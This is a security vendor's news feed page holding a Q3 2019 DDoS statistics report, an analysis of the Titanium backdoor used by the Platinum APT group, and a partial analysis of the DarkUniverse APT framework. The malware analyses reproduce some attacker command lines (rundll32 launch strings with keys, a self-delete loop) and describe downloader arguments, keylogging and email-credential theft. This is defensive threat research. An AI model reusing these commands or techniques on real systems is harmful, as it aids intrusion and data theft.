Subscribe to Kaspersky hírcsatorna Kaspersky
Frissítve: 56 perc 10 másodperc
2019. november 11.

DDoS attacks in Q3 2019

News overview

This past quarter we observed a new DDoS attack that confirmed our earlier hypothesis regarding attacks through the Memcached protocol. As we surmised, the attackers attempted to use another, rather exotic protocol to amplify DDoS attacks. Experts at Akamai Technologies recently registered an attack on one of their clients that was carried out by spoofing the return IP address through the WS-Discovery multicast protocol. According to other security researchers, cybercriminals started using this method only recently, but have already achieved an attack capacity of up to 350 Gbps. The WSD protocol has limited scope and is not generally intended for connecting machines to the Internet; rather devices use it to automatically discover each other on LANs. However, it is fairly common for WSD to be used not entirely for its intended purpose in a variety of equipment — from IP cameras to network printers (about 630,000 such devices are currently hooked up to the Internet). Given the recent rise in the number of WSD-based attacks, owners of such devices are advised to block on the server UDP port 3702, which is used by this protocol, and to take a number of additional steps to protect their routers.

Another new tool in the hands of DDoSers was detected by our colleagues at Trend Micro in the shape of a new payload distributed through a backdoor in the data search and analytics tool Elasticsearch. The malware is dangerous because it employs a multi-stage approach to infection, successfully avoids detection, and can be used to create botnets for launching large-scale DDoS attacks. Trend Micro recommends all Elasticsearch users to upgrade to the latest version, since the backdoor has already been patched.

That said, cybercriminals are far more likely to turn to proven techniques than to try out new ones. For instance, when last year the FBI took down a number of inexpensive DDoS-for-hire sites, new ones immediately sprang up in their place, and today the threat is more acute than ever. According to some reports, the number of attacks carried out with their assistance increased by 400% against the previous quarter.

It is highly likely that the attack on World of Warcraft Classic, launched in early September in several waves was organized through such a service. Before each episode, a certain Twitter user warned of the impending attack. Blizzard later announced the arrest of the mastermind, although whether it was the owner of the corresponding Twitter account remains unclear. But if so, it is hard to escape the conclusion that, far from being a member of a spin-off hacker group, it was a client of a DDoS-for-hire service.

Using another tried-and-tested method (a botnet similar to Mirai — or one of its clones), a 13-day application-level attack was unleashed in July against a streaming service with a capacity of up to 292,000 requests per second. The attack involved about 400,000 devices, mainly home routers.

But whereas the motives behind these two attacks can only be guessed at, two other attacks that took place this summer and fall were almost certainly politically driven. Thus, August 31 saw the targeting of LIHKG Forum, one of the main websites used by protesters in Hong Kong to coordinate their actions. According to the site owners, it was hit by 1.5 billion requests in 16 hours, taking it temporarily offline and causing the mobile app to malfunction.

Soon after that, an attack was conducted on Wikipedia. It began on the evening of September 6 and made the world’s largest online encyclopedia temporarily unavailable to users in various countries of Europe, Africa, and the Middle East. Wikipedia gets hit quite often, but this attack was exceptional in terms of capacity (exact figures are not available, but unofficial sources say more than 1 Tbps) and duration (three days).

The attack organizers remain at large, but several other investigations over the past quarter did reach their logical conclusion. For instance, in early July a US federal court sentenced a certain Austin Thompson of Utah to 27 months in prison and a fine of $95,000 for an attack on Daybreak Game Company (formerly Sony Online Entertainment). And on September 6 another cybercriminal, Kenneth Currin Schuchman of Washington State, admitted his involvement in setting up the Satori IoT botnet.

On the topic of law enforcement efforts, mention must be made of one other piece of news that highlights the importance of prevention in the fight against DDoS attacks. For several quarters now, the section on global botnet activity in our report has featured countries that just a couple of years ago were unlikely contenders to make the ratings. Moreover, the shares of other countries previously beloved of cybercriminals have been falling. This trend was also noted by TechNode, backed up by data from Nexusguard and the World Bank. Our colleagues pinpoint two factors to explain the situation. First, countries once collectively referred to as the Third World have seen rising living standards. More and more residents there are acquiring smartphones and broadband routers — that is, devices that most botnets are made from. Second, in regions where cybercriminals have been plying their trade for a long time, cybersecurity awareness is on the up, and more effective measures are being taken to protect devices, including at the provider level, which means that attackers are having to search for pastures new. This is what is changing the face of our lists of regions by number of cyberattacks.

Quarter trends

Q3 typically sees a lull in DDoS activity over the summer months, followed by a September spike associated with the start of the academic year. This year was no exception.

According to data from Kaspersky DDoS Protection, the number of smart attacks (that is, ones more technically sophisticated and requiring more ingenuity) declined significantly in Q3 against the previous quarter. However, comparing this indicator with the same period last year, we see more than double growth. The prediction made in previous reports is clearly coming true: the DDoS market is stabilizing for smart attacks too. With this in mind, it will be extremely interesting to see the Q4 results.

This stabilization of the market, where growth has been observed throughout the year, is also evidenced by the fact that the average duration of smart attacks is practically unchanged since Q2, yet almost double against Q3 2018. At the same time, the average duration of all attacks fell slightly due to the overall increase in the number of short-lived DDoS sessions.

The giant leap in the maximum duration of attacks on the graph comes from one very long smart attack that we observed this quarter. That this is just a curious anomaly is clearly visible from the medium-length columns.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Changes in the number and statistical distribution of DDoS attacks in Q3 2019 compared to Q2 2019 and Q3 2018 (download)

The change in the share of smart DDoS attacks in the general stream of cyber offensives is worth a separate mention.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Changes in the share of smart DDoS attacks in Q3 2019 compared to Q2 2019 and Q3 2018 (download)

The ratio of smart attacks to the total number of offensives almost halved against the previous quarter but increased by 7 p.p. compared to Q3 2018; the decline in the share of smart attacks against the end of H1 is due to the quirks of September’s statistics.

Like last year, the arrival of September went hand in hand with a significant rise in the number of DDoS attacks. Moreover, this month accounted for 53% of all Q3 attacks, and it was only because of September that any growth in general was observed.

What’s more, 60% of DDoS activity in the early fall was directed at education-related resources: electronic grade books, university websites, and the like. Against the backdrop of such attacks, most of which are short and poorly organized, the share of smart attacks in Q3 sank by 22 p.p.

We observed a similar picture last year, since it is due to students returning to school and university. Most of these attacks are acts of cyber hooliganism carried out by amateurs, most likely with no expectation of financial gain.

Note that the total number of attacks in September 2019 versus September 2018 increased by 35 p.p., while the total number of attacks in Q3 2019 compared to Q3 2018 climbed by 32 p.p. That is, these figures are roughly the same, while the difference in the growth indicators for the number of smart attacks is far greater: whereas the total number of smart attacks increased by 58 p.p., the number of smart attacks in September rose by only 27 p.p., and the month’s share of smart attacks even declined by 3 p.p. This confirms once again the extent to which September skews the overall statistical picture.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Changes in the number and statistical distribution of DDoS attacks in September 2019 compared to September 2018 (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Changes in the share of smart DDoS attacks in September 2019 compared to September 2018 (download)

As such, in Q3 2019, for the first time in the past year, not only did we not observe a clear rise in the number of smart attacks, we saw their total number fall. It is quite possible that last quarter’s positive forecast — that the DDoS market would become saturated and stop growing — came true.

However, based on the experience of past years, in Q4 we expect to see growth in all key indicators (total number of attacks and smart attacks; duration of attacks), since the end of the year is a holiday season, which means more commercial and thus criminal activity. Yet if the conclusions about market stabilization are correct, this growth will not be that considerable.

That the indicators will drop or even remain at the Q3 level seems unlikely to us — in any case, the prerequisites for such a turnout of events are not yet visible.

The barrage of attacks on the education sector will subside by winter, but it will be left completely in peace only in summer when school’s out.


Kaspersky Lab has a long history of combating cyber threats, including DDoS attacks of all types and complexity. Company experts monitor botnets using the Kaspersky DDoS Intelligence system.

The DDoS Intelligence system — part of the Kaspersky DDoS Protection solution — intercepts and analyzes commands sent to bots from C&C servers. The system is proactive, not reactive, meaning that it does not wait for a user device to get infected or a command to be executed.

This report contains DDoS Intelligence statistics for Q3 2019.

In the context of this report, the incident is counted as a single DDoS-attack only if the interval between botnet activity periods does not exceed 24 hours. For example, if the same web resource was attacked by the same botnet with an interval of 24 hours or more, then this is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.

The geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.

DDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools used for DDoS attacks, and that this section does not cover every single DDoS attack that occurred during the review period.

Quarter summary
  • China remains top by number of attacks, with a practically unchanged share compared to Q2 (62.97% against 63.80%).
  • The unexpected guest in the Top 10 ranking by territorial distribution of attacks was South Africa, which took fourth place (2.40%), having never previously appeared in our leaderboard.
  • The Top 10 in terms of territorial distribution by number of targets is similar to the Top 10 by number of attacks: the Top 3 were again China (57.20%), the US (22.16%), and Hong Kong (4.29%).
  • In the past quarter, peak DDOS botnet activity was observed in July; the most dangerous day was Monday (17.53% of attacks), and the quietest was Sunday (10.69%).
  • The longest attack lasted more than 11 days (279 hours), which is almost half as short as in Q2.
  • The most common type of attack is still SYN flooding (79.7%), with UDP flooding in second place (9.4%). The least popular is ICMP flooding (0.5%).
  • The shares of Windows and Linux botnets are almost unchanged against Q2; Linux botnets still account for the vast majority (97.75%) of activity.
  • The leader by number of botnet C&C servers is once more the US (47.55%), followed by the Netherlands in second (22.06%) and China in third (6.37%).
Attack geography

As in previous quarters, the leader by number of attacks is still China, whose share fell by 0.83 p.p. to 62.97%. Likewise, the US remains in second place: its share slightly decreased to 17.37% (against last quarter’s 17.57%). Hong Kong firmly established itself in the bronze position. In contrast to China and the US, its share grew, albeit only by 0.83 p.p. to 5.44%.

The trend seen in past quarters continued, with an interloper rising from the lower ranks into the Top 10. This time it is was South Africa (2.4%), soaring up from 19th position last quarter. It seized fourth place from the Netherlands (0.69%), which dropped down to ninth. What’s more, the Top 10 welcomed back South Korea after a long absence — but not in the Top 3 as before, rather in eighth place with just 0.71%.

Also worth noting is Romania, which gained 0.93 p.p. and rejoined the Top 10 in sixth position with 1.12%. Romania, South Africa, and South Korea collectively squeezed out Taiwan, Australia, and Vietnam.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by country, Q2 and Q3 2019 (download)

The geographical distribution of unique targets this quarter has a lot in common with the distribution of number of attacks — which is fairly typical for statistics of this kind. The Top 3 here also belongs to China (57.20%), the US (22.16%), and Hong Kong (4.29%), with shares close to those in the rating by number of attacks. But there are variances in both Top 10s below. These are partly due to the small share of each individual country (except for the Top 3), which means that even minor fluctuations cause major reshuffles.

For instance, South Africa (1.83%) entered the Top 10 by number of unique targets, though not in fourth place, but fifth, giving way to the UK (2.71%). In the list of leaders by number of attacks, the situation is the opposite: the UK is fifth behind South Africa. Romania also made it back into the rating with a share of 0.71%, while South Korea was pushed overboard. This quarter’s rating also had no place for Taiwan and Ireland.

France remained in last place, its share falling by 0.23 p.p. against the previous quarter to 0.67%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of unique DDoS-attack targets by country, Q3 and Q4 2019 (download)

Dynamics of the number of DDoS attacks

Q3 was relatively calm, with clear peaks and troughs being observed only in July. The most eventful day of this month was the 22nd, with 457 attacks. We also registered a high number of attacks (369) on July 8. The calmest day was August 11 (65 attacks).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Dynamics of the number of DDoS attacks in Q3 2019 (download)

The Q3 distribution of the number of attacks by day of the week was similar to Q2. The safest day in DDoS terms was Sunday (10.69% of attacks), although its share was slightly up from last quarter. As previously, the statistical majority of DDoS attacks occurred on Mondays (17.53%). The only significant difference from last quarter is that the second quietest day (after Sunday) from July to September was not Friday, but Thursday (13.16%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by day of the week, Q2 and Q3 2019 (download)

Duration and types of DDoS attacks

The longest attack this past quarter (traditionally against a Chinese ISP) lasted 11.6 days (279 hours), which is 1.8 times shorter than in Q2 (509 hours). In fairness, however, it should be noted that the longest attack of Q2 is the all-time record holder since our observations began.

Meanwhile, no global changes were seen in the summary statistics: the share of attacks lasting 140+ hours dropped by 0.01 p.p. to 0.12%. Conversely, the share of 20–139-hour attacks increased slightly, while the share of 5–9-hour attacks fell by 1.5 p.p.; the total share of the shortest attacks (lasting no more than four hours) rose just under 2 p.p. to 84.42%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by duration (hours), Q2 and Q3 2019 (download)

The leading attack type remains SYN flooding. Its share changed inappreciably, down from 84% to 79.7%. Second place again went to UDP attacks (9.4%), while HTTP- and TCP-based attacks swapped places: whereas before HTTP flooding ranked third by frequency, it now lies in fourth place with a share of 1.7%, while the share of TCP flooding climbed to 8.7%, more than doubling against the previous quarter (3.1%). As before, ICMP flooding was in last place in Q3.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of DDoS attacks by type, Q3 2019 (download)

The share of Linux botnets continues to grow: Q3’s figure was 97.75%, while the share of Windows botnets, respectively, sank by 1.75 p.p. to 2.25%. This is not due to the growth in activity of Linux botnets, but to the decline in activity of Windows-oriented zombie networks.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Ratio of Windows/Linux botnet attacks, Q2 and Q3 2019 (download) (download)

Botnet distribution geography

As in Q2, the US tops the leaderboard by number of C&C servers located in the country, its share increasing from 44.14% to 47.55%. In second place is the Netherlands: its share also rose — from 12.16% to 22.06%. Such solid growth could not fail to have a major impact on most of the other top-tenners. China, for instance, whose share increased by only 1.42 p.p. to 6.37%, rose from fifth to third place, pushing the UK into fourth (4.90%).

Russia also climbed up the rating into fifth position with a share of 3.92%, while Greece and South Korea slipped out. The newcomer in the Top 10, in bottom place on 1.47%, was Romania, which this quarter also appeared in the leaderboards by number of DDOS attacks and their targets.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of botnet C&C servers by country, Q3 2019 (download) (download)


Statistically, Q3 2019 differs little from Q2. In terms of geographical distribution of attacks and targets, we saw a continuation of the now familiar trend of unexpected guests appearing, only to drop out the next quarter.

As for the chronological distribution of attacks, Q3 was again similar to Q2: turbulence was observed at the beginning of the quarter, with a lull in the middle and small peaks and troughs at the end. The characteristic distribution of attacks by day of the week also remained practically unchanged. The duration of the longest attack fell compared to the previous quarter, but the difference in the percentage shares of long and short attacks is barely noticeable.

All this could indicate either that the DDOS-attack market has temporarily stabilized, or that we face a statistical anomaly. The picture will become clearer upon the analysis of subsequent observations.

2019. november 8.

Titanium: the Platinum group strikes again

Platinum is one of the most technologically advanced APT actors with a traditional focus on the APAC region. During recent analysis we discovered Platinum using a new backdoor that we call Titanium (named after a password to one of the self-executable archives). Titanium is the final result of a sequence of dropping, downloading and installing stages. The malware hides at every step by mimicking common software (protection related, sound drivers software, DVD video creation tools).


During our research we found that the main targets of this campaign were located in South and Southeast Asia.


The Titanium APT includes a complex sequence of dropping, downloading and installing stages, with deployment of a Trojan-backdoor as the final step. Almost every level of the system mimics known software, such as security software, software for making DVD videos, sound drivers’ software etc.

In every case the default distribution is:

  1. an exploit capable of executing code as a SYSTEM user
  2. a shellcode to download the next downloader
  3. a downloader to download an SFX archive that contains a Windows task installation script
  4. a password-protected SFX archive with a Trojan-backdoor installer
  5. an installer script (ps1)
  6. a COM object DLL (a loader)
  7. the Trojan-backdoor itself
Infection vector

We believe the Titanium APT uses local intranet websites with a malicious code to start spreading.

1 – Shellcode

Another known way of spreading is the use of a shellcode that needs to be injected into a process. In this case it was winlogon.exe. Unfortunately, we don’t know how the shellcode was injected. See the shellcode description below.

2 – Wrapper DLLs

Attackers make active use of various kinds of ‘wrappers’. Each wrapper is usually a COM DLL, with the corresponding exported functions. The main purpose of these libraries is to decrypt and load an encrypted file (previously dropped somewhere) into the system memory (a payload) and then redirect calls to the wrapper itself to the payload’s exported functions.

Another type of wrapper DLL is designed to obtain a command line from its exported function argument passed by a caller and create a new process.

3 – Windows task installer (SFX archive)

This is a password-encrypted SFX archive that can be downloaded via BITS Downloader. The password is hardcoded into the downloader that is used to decrypt the SFX archive using the -p command line argument.

The main feature of this archive is that it contains the cURL executable code, compiled into a DLL. Its purpose is to install the Windows task to establish persistence in the infected system.

4 – Trojan-Backdoor installer (SFX archive)

The backdoor itself uses an SFX archive which must be launched from the command line using a password to unpack it. All paths examples here and there will be for the DVD making software. However, these notes can be also applied to any other known software paths.

5 – BITS Downloader

This component is used to download encrypted files from the C&C server then decrypt and launch them.

Shellcode description

The shellcode itself contains position-independent code and doesn’t require previously loaded libraries (except Kernel32.dll). Its sole purpose is to connect to the hardcoded C&C address, download an encrypted payload (the password-protected SFX archive), then decrypt and launch it using the hardcoded unpacking password. The usual command line is:

"rundll32 "$temp\IOZwXLeM023.tmp",GetVersionInfo -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw" BITS Downloader description

The BITS Downloader is a DLL file which has only one exported function: GetVersionInfoA. The main purpose of this library is to download files in encrypted form from the C&C and launch them.

Execution sequence

The first thing the downloader does is to check whether it was started using the SYSTEM user. If it was, it launches command line arguments (that were passed to the binary loaded by the downloader DLL) using WMI.

If it wasn’t started using the SYSTEM user, the downloader passes command line arguments into the argument parser.

Argument parser Key Parameter description -c URL Specifies a URL address where system information will be sent -t STRING An additional string that will be appended to a request string to the C&C -u URL Confirmation URL where the downloader will send various confirmations or request data. Possible to build in two additional confirmation URLs -br GUID Stop a payload downloading. The GUID parameter must provide a download task GUID

If one of these parameters exists, the downloader will collect information about installed antivirus products and send it to the C&C.

After that, it sends the download request to the confirmation URL. In response, the C&C sends a file that will be downloaded in the %USERPROFILE% directory.

To decrypt the downloaded file, the downloader uses an MD5 hash of the strings’ encryption key.

Confirmation URL request and file downloading

Default (hardcoded) URL:

The request is a string such as:

  • (x86)
  • (x64)
Payload decryption and launch

This is the structure of the encrypted file:

typedef struct { byte hash[16]; // md5 hash of the following data dword data_size; byte data[data_size]; } enc_data;

The downloader checks the hash field against a calculated MD5 of the data field hash, and if the hash is correct, performs the following actions:

  • Appends an extension (DLL or EXE, depending on data type)
  • Stores the downloaded file in the %TMP% folder using the name %(SystemTimeAsFileTime.dwLowDateTime).%TMP

Then the downloader specifies a command line to launch the downloaded file. If the file is a DLL, the final command line will be:

"%systemroot%\system32\rundll32.exe %(SystemTimeAsFileTime.dwLowDateTime)%.TMP,-peuwewh383eg -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw"

If the file is an EXE file:

%(SystemTimeAsFileTime.dwLowDateTime)%.TMP -peuwewh383eg -t 06xwsrdrub2i84n6map3li3vz3h9bh4vfgcw

After that, the downloader deletes itself using the following command line:

/c for /L %i in (1,1,100) do ( for /L %k in (1,1,100) do (del /f /q module_path > NUL & if not exist module_path exit /b 0)) File launching

To launch the downloaded file, the downloader uses the WMI classes Win32_ProcessStartup, Win32_Process and their methods and fields.

File downloading using BITS

To download a file, the downloader uses the BITS service and its COM interface, called IBackgroundCopyManager.

It creates a task with the name Microsoft Download, then specifies remote and local file paths and timeouts.

Windows task installation (SFX archive with cURL)

It contains:

Name Description p.bat Launches cURL and obfuscated ps1 scripts c.dll cURL executable compiled as a DLL (7.50.3) f1.ps1 Will be executed after the first request to the C&C; decrypts x.dat f2.ps1 Will be executed after the second request to the C&C; decrypts b.dat e.ps1 Contains code that calculates a string for the Authorization field of the HTTP header h.ps1 Gets information about the system proxy settings e.dll A DLL file with a single exported function; calls CreateProcessA

It downloads:

Source file Downloaded and decrypted file Description x.dat u.xml AES-encrypted file (see f1.ps1 for decryption algorithm) b.dat i.bat AES-encrypted file (the same decryption algorithm)

The result:

Name Description i.bat Performs Windows task installation

When a caller (previous step) executes this archive, it must specify two arguments:

Argument Description -pKEY Argument with a key to unpack the SFX archive -t ACCEPTANCE_ID_STRING Argument with a long string – AcceptanceID (used in requests to the C&C) p.bat

It launches the h.ps1 script to get information about system-wide proxy settings. After that it launches the e.ps1 script to calculate the SystemID that will be used in requests to the C&C.

To send a request, it uses c.dll (which is cURL and has an exported function called DllGetClassObject).

Request 1

Command line arguments:


Parameter Description %pp% System-wide proxy %output% SystemID %p3% AcceptanceID

This request downloads the x.dat file, and the f1.ps1 script decrypts it into u.xml. After that it launches the next request.

Request 2

Command line arguments:

It downloads the b.dat file, and the f2.ps1 script decrypts it into i.bat (using the same decryption algorithm).

Task installation

After that, it launches the following command line to install the persistence task:

The i.bat file uses the previously decrypted u.xml file as the task description.

Trojan-backdoor installer

The archive unpacks its files into the following folder (in the case of DVD making software):

The archive itself contains:

Name Description BabyBoyStyleBackground.wmv Configuration data DvDupdate.dll Trojan-backdoor loader nav_downarrow.png Trojan-backdoor psinstrc.ps1 Loader installation script

In the case of the audio drivers software mimic, it differs only in its installation method compared to DVD making software: the ps1 script uses two known CLSIDs to replace their COM DLL paths with malicious ones.


This is the installer script that registers DvDupdate.dll as the ‘DVDMaker Help’ service, and sets its entry point as the DllGetClassObject name. It requires admin privileges to be executed correctly.

The script contains configurable parameters, so it’s easy to change any of the required parameters for different systems.

There are two ways the loader can be installed:

  • System service, with the DllGetClassObject exported function as the ServiceMain function
  • COM object, by replacing an existing CLSID registry path with its own

This is a service DLL, but with all the same exports you would expect from a COM object. Basically, it’s a payload loader.

The whole code is obfuscated with different Windows API calls and loops. It wasn’t designed to confuse a reverse engineer or to make reverse engineering harder, but to bypass some simple AV emulation engines.

The first exported function for every COM object is DllGetClassObject.


The loader creates a thread that decrypts the payload, restores its PE and MZ headers, and then loads it into memory and launches it. The payload is encrypted with AES 256 CBC. The decryption key is hardcoded along with other encrypted strings. It doesn’t contain ‘MZ‘ and ‘PE‘ tags that allow it to bypass simple AV engines. After initializing the payload, the loader calls its function with ordinal 1.


The payload, with backdoor functionality, is a DLL file. The malware functionality is in the first exported entry only.

nav_downarrow.png – Ordinal 1 (Trojan-backdoor main function)

The first thing that it does is decrypt the other encrypted binary (containing configuration data) from the SFX content:

The configuration itself is divided into blocks, and every block has its own index. The payload uses these indices to get a specific item. The configuration contains:

  • the C&C address
  • traffic encryption key
  • the UserAgent string
  • other less important parameters
Execution thread

The execution thread is responsible for receiving commands from the C&C server and sending responses. It contains an execution loop that starts by reading configuration item #00 to get the C&C address.

Initializing C&C communication

To initialize the connection to the C&C, the payload sends a base64-encoded request that contains a unique SystemID, computer name, and hard disk serial number. After that, the malware starts receiving commands.

Receiving commands

To receive commands from the C&C, the payload sends an empty request to the C&C. It uses the UserAgent string from the configuration and a special cookie generation algorithm to prepare a request. The malware can also get proxy settings from Internet Explorer.

In response to this request, the C&C answers with a PNG file that contains steganographically hidden data. This data is encrypted with the same key as the C&C requests. The decrypted data contains backdoor commands and arguments for them.

Examples of PNG files:

C&C command processor (command descriptions)

The backdoor can accept many different commands, with the following among the most interesting:

  • Read any file from a file system and send it to the C&C
  • Drop or delete a file in the file system
  • Drop a file and run it
  • Run a command line and send execution results to the C&C
  • Update configuration parameters (except the AES encryption key)
  • Interactive mode – allows to the attacker to receive input from console programs and send their output at the C&C

The Titanium APT has a very complicated infiltration scheme. It involves numerous steps and requires good coordination between all of them. In addition, none of the files in the file system can be detected as malicious due to the use of encryption and fileless technologies. One other feature that makes detection harder is the mimicking of well-known software.

Regarding campaign activity, we have not detected any current activity related to the Titanium APT.

2019. november 5.

DarkUniverse – the mysterious APT framework #27

In April 2017, ShadowBrokers published their well-known ‘Lost in Translation’ leak, which, among other things, contained an interesting script that checked for traces of other APTs in the compromised system.

In 2018, we found an APT described as the 27th function of this script, which we call ‘DarkUniverse’. This APT was active for at least eight years, from 2009 until 2017. We assess with medium confidence that DarkUniverse is a part of the ItaDuke set of activities due to unique code overlaps. ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server urls.

Technical details Infection vector

Spear phishing was used to spread the malware. A letter was prepared separately for each victim to grab their attention and prompt them to open an attached malicious Microsoft Office document.

Each malware sample was compiled immediately before being sent and included the latest available version of the malware executable. Since the framework evolved from 2009 to 2017, the last releases are totally different from the first ones, so the current report details only the latest available version of the malware used until 2017.

The executable file embedded in the documents extracts two malicious files from itself, updater.mod and glue30.dll, and saves them in the working directory of the malware – %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Reorder.

After that, it copies the legitimate rundll32.exe executable into the same directory and uses it to run the updater.mod library.

The updater.mod module

This module is implemented as a dynamic-link library with only one exported function, called callme@16. This module is responsible for such tasks as providing communication with the C2 server, providing the malware integrity and persistence mechanism and managing other malware modules.

The persistence mechanism is provided by a link file, which is placed by updater.mod into the startup folder, ensuring malware execution after a reboot. If the link file becomes corrupted, the updater.mod module restores it.

Communication with C2

In this campaign the C2 servers were mostly based on cloud storage at mydrive.ch. For every victim, the operators created a new account there and uploaded additional malware modules and a configuration file with commands to execute it. Once executed, the updater.mod module connected to the C2 and performed the following actions:

  • downloaded the command file to the working directory;
  • uploaded files collected and prepared by additional malicious modules (if any) to the C2. These files were located in a directory called ‘queue’ or ‘ntfsrecover’ in the working directory. Files in this directory could have one of two extensions: .d or .upd depending on whether they had already been uploaded to the server or not.
  • downloaded additional malware modules:
    • dfrgntfs5.sqt – a module for executing commands from the C2;
    • msvcrt58.sqt – a module for stealing mail credentials and emails;
    • zl4vq.sqt – legitimate zlib library used by dfrgntfs5;
    • %victim_ID%.upe – optional plug-in for dfrgntfs5. Unfortunately, we were unable to obtain this file.

All malware modules are encrypted with a custom algorithm:

The credentials for the C2 account are stored in the configuration that is placed in the registry, but the updater.mod module also stores a copy as an encrypted string in the executable file. Also, the configuration specifies how often updater.mod polls the C2, supporting both an active mode and a partly active mode.

Malware configuration in the registry

The malware configuration is stored in the registry in the SOFTWARE\AppDataLow\GUI\LegacyP entry. Different values are detailed in the following table:

Value name Description C1 C2 domain. C2 C2 domain path. C3 C2 credential username. C4 C2 credential password. install 1 if malware is installed. TL1 DESACTIVAR | HABILITAR – specifies whether msvcrt58 and glue libraries are active. TL2, TL3 If TL1 is not NULL, it specifies time bounds when TL1 option is applied. “kl” If 1, updater.mod should download msvcrt58.sqt from C2 again. “re” If 1, updater.mod should download dfrgntfs5.sqt from C2 again. “de” If not 0, framework should uninstall itself. “cafe” REDBULL | SLOWCOW specifies how often updater.mod polls C2. “path” Path to the folder from which files are being sent to C2.


Modules glue30.dll and msvcrt58.sqt

The glue30.dll malware module provides keylogging functionality. The updater.mod module uses the Win API function SetWindowsHookExW to install hooks for the keyboard and to inject glue30.dll into processes that get keyboard input. After that, glue30.dll loads and begins intercepting input in the context of each hooked process.

The msvcrt58.sqt module intercepts unencrypted POP3 traffic to collect email conversations and victims’ credentials. This module looks for traffic from the following processes:

  • outlook.exe;
  • winmail.exe;
  • msimn.exe;
  • nlnotes.exe;
  • eudora.exe;
  • thunderbird.exe;
  • thunde~1.exe;
  • msmsgs.exe;
  • msnmsgr.exe.

The malware parses intercepted POP3 traffic and sends the result to the main module (updater.mod) for uploading to the C2. This is done by hooking the following network-related Win API functions:

  • ws2_32.connect;
  • ws2_32.send;
  • ws2_32.recv;
  • ws2_32.WSARecv;
  • ws2_32.closesocket.


The dfrgntfs5.sqt module

This is the most functional component of the DarkUniverse framework. It processes an impressive list of commands from the C2, which are listed in the following table.

